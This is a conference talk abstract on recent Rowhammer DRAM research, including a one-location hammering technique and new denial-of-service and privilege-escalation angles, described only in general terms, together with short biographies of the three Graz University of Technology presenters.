The Rowhammer bug is an issue in most DRAM modules which allows software to cause bit flips in DRAM cells, consequently manipulating data. Although only considered a reliability issue by DRAM vendors, research has showed that a single bit flip can subvert the security of an entire computer system.
In the introduction of the talk, we will outline the developments around Rowhammer since its presentation at Black Hat USA 2015. We discuss attacks and defenses that researchers came up with. The defenses against Rowhammer either try to prevent the Rowhammer effect entirely, or at least ensure that Rowhammer attacks cannot exploit the bug anymore.
We will present a novel Rowhammer attack that undermines all existing assumptions on the requirements for such attacks. With one-location hammering, we show that Rowhammer does not necessarily require to access two or more addresses alternatingly. We explain that modern CPUs rely on memory-controller policies that enables an attacker to use this new hammering technique. Moreover, we introduce new building blocks for exploiting Rowhammer-like bit flips which circumvent all currently proposed countermeasures. In addition to classical privilege escalation attacks, we also demonstrate a new, easily mountable denial-of-service attack which can be exploited in the cloud.
We will also show that despite all efforts, the Rowhammer bug is still not prevented. We conclude that more research is required to fully understand this bug to subsequently be able to design efficient and secure countermeasures.
Michael Schwarz is an Infosec PhD student at Graz University of Technology with a focus on microarchitectural side-channel attacks and system security. He holds two master's degrees, one in computer science and one in software development with a strong focus on security. He frequently participates in CTFs and has also been a finalist in the European Cyber Security Challenge. He was a speaker at Black Hat Europe 2016 and Black Hat Asia 2017 where he presented his research on microarchitectural side-channel attacks. He authored and co-authored several papers published at international academic conferences and journals, including USENIX Security 2016, NDSS 2017, and NDSS 2018.
Daniel Gruss (@lavados) is a PostDoc at Graz University of Technology. He finished his PhD with distinction in less than 3 years. He has been involved in teaching undergraduate courses since 2010. Daniel's research focuses on software-based side-channel attacks that exploit timing differences in hardware and operating systems. He implemented the first remote fault attack running in a website, known as Rowhammer.js. He spoke at top international venues, including Black Hat USA 2016, Usenix Security 2015 & 2016, ACM CCS 2016, the Chaos Communication Congress 2015, and many more. His research team was one of the four teams that found the Meltdown and Spectre bugs published in early 2018.
Moritz Lipp is a researcher in information security at Graz University of Technology. He is pursuing his PhD with a strong focus on microarchitectural side-channel attacks on personal computers and mobile devices at the Institute of Applied Information Processing and Communications. His research has been published at top academic conferences and presented on different venues around the world.